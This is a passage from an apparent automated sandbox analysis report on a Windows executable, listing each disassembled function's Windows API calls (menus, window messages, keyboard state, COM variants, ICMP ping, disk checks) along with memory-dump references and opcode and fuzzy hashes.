                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E5D
                                                                                                                                                                              • __allrem.LIBCMT ref: 004D5E74
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E92
                                                                                                                                                                              • __invoke_watson.LIBCMT ref: 004D5F03
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 384356119-0
                                                                                                                                                                              • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                                                                              • Instruction ID: 8d964334dc49b26038b8e4b356881d5f883f09bd2c2a1d87b6f70490f31f3736
                                                                                                                                                                              • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                                                                              • Instruction Fuzzy Hash: 5E71F771A01B16ABD714AF6ACC51B6BB3A9AF00725F14422FF514D7781EF78DE008B98
                                                                                                                                                                              Function 004F57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5816
                                                                                                                                                                              • GetMenuItemInfoW.USER32(005718F0,000000FF,00000000,00000030), ref: 004F5877
                                                                                                                                                                              • SetMenuItemInfoW.USER32(005718F0,00000004,00000000,00000030), ref: 004F58AD
                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 004F58BF
                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 004F5903
                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 004F591F
                                                                                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 004F5949
                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 004F598E
                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004F59D4
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F59E8
                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F5A09
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4176008265-0
                                                                                                                                                                              • Opcode ID: bce81fa997dafe5c6eb178f4d0ad1ff19ef994ff0726b9f611f98a61873cb171
                                                                                                                                                                              • Instruction ID: 7bf4fdf52f2cd79fe68ca1e13faf41f55f72e5e153ec0ef69dcdeb245ed3372d
                                                                                                                                                                              • Opcode Fuzzy Hash: bce81fa997dafe5c6eb178f4d0ad1ff19ef994ff0726b9f611f98a61873cb171
                                                                                                                                                                              • Instruction Fuzzy Hash: D361CBB0900A4DEFDB15DFA8E888EBF7BB8EB01358F14011AE741A3251D378AD05DB25
                                                                                                                                                                              Function 00519A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00519AA5
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00519AA8
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00519ACC
                                                                                                                                                                              • _memset.LIBCMT ref: 00519ADD
                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00519AEF
                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00519B67
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 830647256-0
                                                                                                                                                                              • Opcode ID: 83fd3b7805092c7d06e715e1ff3e65d639c5877f61e0a5c62490d0eb53f888dc
                                                                                                                                                                              • Instruction ID: eb5e0bc2654097eb24a2463f80d9a5246f4f946d508486f2198cb6e92fe75f1a
                                                                                                                                                                              • Opcode Fuzzy Hash: 83fd3b7805092c7d06e715e1ff3e65d639c5877f61e0a5c62490d0eb53f888dc
                                                                                                                                                                              • Instruction Fuzzy Hash: AE618B75900208AFEB10DFA8DC91EEE7BF8BF09304F144159FA19A7291C770AD85DBA4
                                                                                                                                                                              Function 004F3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 004F3591
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 004F3612
                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 004F362D
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 004F3647
                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 004F365C
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 004F3674
                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 004F3686
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 004F369E
                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 004F36B0
                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 004F36C8
                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 004F36DA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                              • Opcode ID: 656be838c1ff77c1202a2416320810cee88780d371bcfff13bdcb3868a847068
                                                                                                                                                                              • Instruction ID: 59d00228232c2e2f2dcd307098812ff5ae44e0636184fd5d87f519caba71cf81
                                                                                                                                                                              • Opcode Fuzzy Hash: 656be838c1ff77c1202a2416320810cee88780d371bcfff13bdcb3868a847068
                                                                                                                                                                              • Instruction Fuzzy Hash: 114172705047CD7DFF315E6494143B7BAB06B2134AF04405BD7C6863C2EBA89BC8876A
                                                                                                                                                                              Function 004EA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004EA2AA
                                                                                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 004EA2F5
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004EA307
                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004EA327
                                                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 004EA36A
                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004EA37E
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004EA393
                                                                                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 004EA3A0
                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EA3A9
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004EA3BB
                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EA3C6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2706829360-0
                                                                                                                                                                              • Opcode ID: 91e8b7626e5df8e6047221bfdf6f7defda39553f371f3190bd990c02783e51ba
                                                                                                                                                                              • Instruction ID: c0ff3831ecb9ce5648a64b3ad897cc25d35aaf8027218990980fdac2ebe2ea60
                                                                                                                                                                              • Opcode Fuzzy Hash: 91e8b7626e5df8e6047221bfdf6f7defda39553f371f3190bd990c02783e51ba
                                                                                                                                                                              • Instruction Fuzzy Hash: AF414D31900219AFCF01DFA5D8849DEBFB9FF08345F00806AF901A7251DB74AA59DBA5
                                                                                                                                                                              Function 0050B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • CoInitialize.OLE32 ref: 0050B298
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0050B2A3
                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0053D8FC,?), ref: 0050B303
                                                                                                                                                                              • IIDFromString.OLE32(?,?), ref: 0050B376
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0050B410
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0050B471
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                              • API String ID: 834269672-1287834457
                                                                                                                                                                              • Opcode ID: 48f2a6ee085c431ddee1ceca2ef4157deb703b160c04b7e1323dce5a35bc2597
                                                                                                                                                                              • Instruction ID: 18f173c7f03f3a59dbc1f0b468f76d1648b878fa85cd033332fe6913687def26
                                                                                                                                                                              • Opcode Fuzzy Hash: 48f2a6ee085c431ddee1ceca2ef4157deb703b160c04b7e1323dce5a35bc2597
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F61AC70204701AFE710DF55C889BAEBBE8BF88714F14481EF9859B291D770EE48CB96
                                                                                                                                                                              Function 00508694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 005086F5
                                                                                                                                                                              • inet_addr.WSOCK32(?,?,?), ref: 0050873A
                                                                                                                                                                              • gethostbyname.WSOCK32(?), ref: 00508746
                                                                                                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00508754
                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005087C4
                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005087DA
                                                                                                                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0050884F
                                                                                                                                                                              • WSACleanup.WSOCK32 ref: 00508855
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                              • String ID: Ping
                                                                                                                                                                              • API String ID: 1028309954-2246546115
                                                                                                                                                                              • Opcode ID: 6ce03fad076bedae8f4bd3ae3112f118485b66e24febb03a1a971d7dd23f6eea
                                                                                                                                                                              • Instruction ID: 7d24e70ee4017e02bd9e15171cab4f62010fa913f751978bea9de60354c44b23
                                                                                                                                                                              • Opcode Fuzzy Hash: 6ce03fad076bedae8f4bd3ae3112f118485b66e24febb03a1a971d7dd23f6eea
                                                                                                                                                                              • Instruction Fuzzy Hash: B151AE31604201AFDB10AF25CC85F6EBBE4FF48724F04882AF9969B2E1DB74E804DB51
                                                                                                                                                                              Function 00519C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 00519C68
                                                                                                                                                                              • CreateMenu.USER32 ref: 00519C83
                                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00519C92
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00519D1F
                                                                                                                                                                              • IsMenu.USER32(?), ref: 00519D35
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00519D3F
                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00519D70
                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00519D7E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 176399719-4108050209
                                                                                                                                                                              • Opcode ID: 5ead7cccb98b59caded0895a6293218895eb390b8b8b4a4a8b8cfbe20a9c893b
                                                                                                                                                                              • Instruction ID: d4c10c150bfe60b1a598474a3696364084720cf4c6dabf8c317e812975d3d155
                                                                                                                                                                              • Opcode Fuzzy Hash: 5ead7cccb98b59caded0895a6293218895eb390b8b8b4a4a8b8cfbe20a9c893b
                                                                                                                                                                              • Instruction Fuzzy Hash: 18416A75A00209EFEB10EF68E894BDABBF5FF49344F140029E945A7351D730A954EF60
                                                                                                                                                                              Function 004FEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 004FEC1E
                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004FEC94
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004FEC9E
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 004FED0B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                              • API String ID: 4194297153-14809454
                                                                                                                                                                              • Opcode ID: ea99958d5c8e11d317af583d1b1cbeefe60032b1fe7aafa41a9ccae969d1f1ab
                                                                                                                                                                              • Instruction ID: 07ded8a3dd63178c0a63ec8b03525226bf2a069b54b16d75e292f749b04d3571
                                                                                                                                                                              • Opcode Fuzzy Hash: ea99958d5c8e11d317af583d1b1cbeefe60032b1fe7aafa41a9ccae969d1f1ab
                                                                                                                                                                              • Instruction Fuzzy Hash: 7331E135A002499FC700EF66C845ABABBB4FF44701F10402BF601D73A1DA799D42DB95
                                                                                                                                                                              Function 004EC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004EC782
                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 004EC78D
                                                                                                                                                                              • GetParent.USER32 ref: 004EC7A9
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004EC7AC
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 004EC7B5
                                                                                                                                                                              • GetParent.USER32(?), ref: 004EC7D1
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 004EC7D4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 313823418-1403004172
                                                                                                                                                                              • Opcode ID: 62a052fd2c01d537f6293065e4df3cf4827837cf0d013c9a2e6e8be145f9729a
                                                                                                                                                                              • Instruction ID: ca8cf07a9b074c4ead5b658a51dd7b49c64bd799e826e5ae5c104476c19df93d
                                                                                                                                                                              • Opcode Fuzzy Hash: 62a052fd2c01d537f6293065e4df3cf4827837cf0d013c9a2e6e8be145f9729a
                                                                                                                                                                              • Instruction Fuzzy Hash: BA21B074900209AFCF04ABA5CCC6EFEBB75EB55301F10011AF562932D1DBB9581AEB24
                                                                                                                                                                              Function 004EC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004EC869
                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 004EC874
                                                                                                                                                                              • GetParent.USER32 ref: 004EC890
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004EC893
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 004EC89C
                                                                                                                                                                              • GetParent.USER32(?), ref: 004EC8B8
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 004EC8BB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 313823418-1403004172
                                                                                                                                                                              • Opcode ID: ad4f4d83dac83146e63d156c65d193bf277820694c27065f4074e2cbcfac9233
                                                                                                                                                                              • Instruction ID: be086e8fea26c45e8229d30b0eda16cab9b11a507861ab1add5603f9a1bb2a4f
                                                                                                                                                                              • Opcode Fuzzy Hash: ad4f4d83dac83146e63d156c65d193bf277820694c27065f4074e2cbcfac9233
                                                                                                                                                                              • Instruction Fuzzy Hash: 1421A171900208ABDF04ABA6CCC6EFEBB75EB55301F100056F551A3291DBB9581AAB24
                                                                                                                                                                              Function 004EC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32 ref: 004EC8D9
                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 004EC8EE
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EC900
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004EC97B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
